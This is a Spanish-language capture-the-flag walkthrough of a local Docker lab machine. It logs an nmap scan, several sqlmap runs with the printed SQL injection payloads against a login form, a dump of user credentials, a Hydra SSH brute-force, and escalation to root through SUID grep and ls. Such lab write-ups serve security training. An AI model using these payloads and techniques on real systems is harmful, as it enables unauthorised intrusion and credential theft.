Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipbackend.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shbackend.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Si nos vamos a la pagina veremos un login, que estara en la siguiente direccion:
Si probamos a realizar un SQLInjection con un request de la siguiente forma:
Primero capturaremos la peticion del login con BurpSuite, por lo que pondremos lo que sea en mi caso admin:admin y le daremos a login mientras esta BurpSuit escuchando, esto nos capturara la peticion y veremos algo asi:
request.txt
sqlmap
Por lo que volcaremos toda la base de datos para ver que hay si funcionara:
Info:
Vemos que efectivamente nos volco la base de datos y entre ellas hay una muy interesante llamada users, por lo que haremos lo siguiente:
Info:
Vemos que hay una tabla llamada usuarios:
Info:
Por lo que vemos hay varias columnas interesantes, por lo que veremos la informacion de cada una de ellas:
Info:
Escalate user pepe
Hydra
Vemos que pudimos obtener las credenciales de 3 usuarios, por lo que probaremos fuerza bruta por SSH creando un diccionario de cada uno de los usuarios y contraseñas:
users.txt
pass.txt
Y lanzaremos un hydra:
Info:
Por lo que vemos obtuvimos las credenciales del usuario pepe, por lo que nos conectaremos con dichas credenciales.
SSH
Metemos como contraseña P123pepe3456P y veremos que estamos dentro.
Escalate Privileges
Si listamos los permisos SUID que tenemos, veremos lo siguiente:
Info:
Vemos 2 bastante interesantes llamados grep y ls, por lo que si lo ejecutamos lo ejecutaremos como el usuario root.
Si hacemos esto:
Info:
Vemos que hay un archivo interesante llamado pass.hash que podremos leer de la siguiente forma:
Info:
Por lo que vemos hay una contraseña codificada en MD5 que si lo decodificamos veremos lo siguiente:
Por lo que la utilizaremos para ser root.
Metemos como contraseña spongebob34 y veremos que somos root.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 05:37 EST
Nmap scan report for spainmerides.dl (172.17.0.2)
Host is up (0.000038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 08:ba:95:95:10:20:1e:54:19:c3:33:a8:75:dd:f8:4d (ECDSA)
|_ 256 1e:22:63:40:c9:b9:c5:6f:c2:09:29:84:6f:e7:0b:76 (ED25519)
80/tcp open http Apache httpd 2.4.61 ((Debian))
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: test page
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds
___
__H__
___ ___[,]_____ ___ ___ {1.8.11#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:41:02 /2025-01-10/
[05:41:02] [INFO] parsing HTTP request from 'request.txt'
[05:41:02] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[05:41:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:41:06] [INFO] testing if the target URL content is stable
[05:41:06] [WARNING] POST parameter 'username' does not appear to be dynamic
[05:41:06] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[05:41:06] [INFO] testing for SQL injection on POST parameter 'username'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[05:41:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:41:08] [WARNING] reflective value(s) found and filtering out
[05:41:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:41:08] [INFO] testing 'Generic inline queries'
[05:41:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[05:41:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[05:41:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[05:41:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[05:41:09] [INFO] POST parameter 'username' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[05:41:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[05:41:09] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[05:41:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[05:41:09] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[05:41:09] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[05:41:09] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[05:41:09] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[05:41:09] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[05:41:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[05:41:09] [INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[05:41:09] [INFO] testing 'MySQL inline queries'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[05:41:09] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[05:41:09] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:41:19] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[05:41:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[05:41:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[05:41:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:41:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:41:19] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N]
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[05:41:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[05:41:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[05:41:24] [INFO] testing 'MySQL UNION query (40) - 21 to 40 columns'
[05:41:24] [INFO] testing 'MySQL UNION query (20) - 41 to 60 columns'
[05:41:24] [INFO] testing 'MySQL UNION query (20) - 61 to 80 columns'
[05:41:24] [INFO] testing 'MySQL UNION query (20) - 81 to 100 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' RLIKE (SELECT (CASE WHEN (8933=8933) THEN 0x61646d696e ELSE 0x28 END))-- AJzr&password=admin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' AND (SELECT 7445 FROM(SELECT COUNT(*),CONCAT(0x717a787a71,(SELECT (ELT(7445=7445,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IIJH&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5315 FROM (SELECT(SLEEP(5)))gRbi)-- HTBl&password=admin
---
[05:41:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:41:25] [INFO] fetching database names
[05:41:25] [INFO] retrieved: 'information_schema'
[05:41:25] [INFO] retrieved: 'performance_schema'
[05:41:25] [INFO] retrieved: 'sys'
[05:41:25] [INFO] retrieved: 'mysql'
[05:41:25] [INFO] retrieved: 'users'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
[05:41:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:41:25 /2025-01-10/
___
__H__
___ ___["]_____ ___ ___ {1.8.11#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:44:37 /2025-01-10/
[05:44:37] [INFO] parsing HTTP request from 'request.txt'
[05:44:37] [INFO] resuming back-end DBMS 'mysql'
[05:44:37] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' RLIKE (SELECT (CASE WHEN (8933=8933) THEN 0x61646d696e ELSE 0x28 END))-- AJzr&password=admin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' AND (SELECT 7445 FROM(SELECT COUNT(*),CONCAT(0x717a787a71,(SELECT (ELT(7445=7445,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IIJH&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5315 FROM (SELECT(SLEEP(5)))gRbi)-- HTBl&password=admin
---
[05:44:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:44:37] [INFO] fetching tables for database: 'users'
[05:44:37] [INFO] retrieved: 'usuarios'
Database: users
[1 table]
+----------+
| usuarios |
+----------+
[05:44:37] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:44:37 /2025-01-10/
___
__H__
___ ___[(]_____ ___ ___ {1.8.11#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:45:42 /2025-01-10/
[05:45:42] [INFO] parsing HTTP request from 'request.txt'
[05:45:42] [INFO] resuming back-end DBMS 'mysql'
[05:45:42] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' RLIKE (SELECT (CASE WHEN (8933=8933) THEN 0x61646d696e ELSE 0x28 END))-- AJzr&password=admin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' AND (SELECT 7445 FROM(SELECT COUNT(*),CONCAT(0x717a787a71,(SELECT (ELT(7445=7445,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IIJH&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5315 FROM (SELECT(SLEEP(5)))gRbi)-- HTBl&password=admin
---
[05:45:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:45:42] [INFO] fetching columns for table 'usuarios' in database 'users'
[05:45:42] [INFO] starting 3 threads
[05:45:42] [INFO] retrieved: 'id'
[05:45:42] [INFO] retrieved: 'password'
[05:45:42] [INFO] retrieved: 'username'
[05:45:42] [INFO] retrieved: 'int(11)'
[05:45:43] [INFO] retrieved: 'varchar(255)'
[05:45:43] [INFO] retrieved: 'varchar(255)'
Database: users
Table: usuarios
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
[05:45:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:45:43 /2025-01-10/
___
__H__
___ ___[(]_____ ___ ___ {1.8.11#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:46:42 /2025-01-10/
[05:46:42] [INFO] parsing HTTP request from 'request.txt'
[05:46:42] [INFO] resuming back-end DBMS 'mysql'
[05:46:42] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' RLIKE (SELECT (CASE WHEN (8933=8933) THEN 0x61646d696e ELSE 0x28 END))-- AJzr&password=admin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' AND (SELECT 7445 FROM(SELECT COUNT(*),CONCAT(0x717a787a71,(SELECT (ELT(7445=7445,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IIJH&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5315 FROM (SELECT(SLEEP(5)))gRbi)-- HTBl&password=admin
---
[05:46:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:46:42] [INFO] fetching columns for table 'usuarios' in database 'users'
[05:46:42] [INFO] starting 3 threads
[05:46:42] [INFO] resumed: 'id'
[05:46:42] [INFO] resumed: 'int(11)'
[05:46:42] [INFO] resumed: 'username'
[05:46:42] [INFO] resumed: 'varchar(255)'
[05:46:42] [INFO] resumed: 'password'
[05:46:42] [INFO] resumed: 'varchar(255)'
[05:46:42] [INFO] fetching entries for table 'usuarios' in database 'users'
[05:46:42] [INFO] starting 3 threads
[05:46:42] [INFO] retrieved: '1'
[05:46:42] [INFO] retrieved: '3'
[05:46:42] [INFO] retrieved: '2'
[05:46:42] [INFO] retrieved: '$paco$123'
[05:46:42] [INFO] retrieved: 'jjuuaann123'
[05:46:42] [INFO] retrieved: 'paco'
[05:46:42] [INFO] retrieved: 'P123pepe3456P'
[05:46:42] [INFO] retrieved: 'juan'
[05:46:42] [INFO] retrieved: 'pepe'
Database: users
Table: usuarios
[3 entries]
+----+---------------+----------+
| id | password | username |
+----+---------------+----------+
| 1 | $paco$123 | paco |
| 2 | P123pepe3456P | pepe |
| 3 | jjuuaann123 | juan |
+----+---------------+----------+
[05:46:42] [INFO] table 'users.usuarios' dumped to CSV file '/root/.local/share/sqlmap/output/172.17.0.2/dump/users/usuarios.csv'
[05:46:42] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:46:42 /2025-01-10/
paco
pepe
juan
$paco$123
P123pepe3456P
jjuuaann123
hydra -L users.txt -P pass.txt ssh://<IP> -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-10 05:47:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: pepe password: P123pepe3456P
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-10 05:48:02
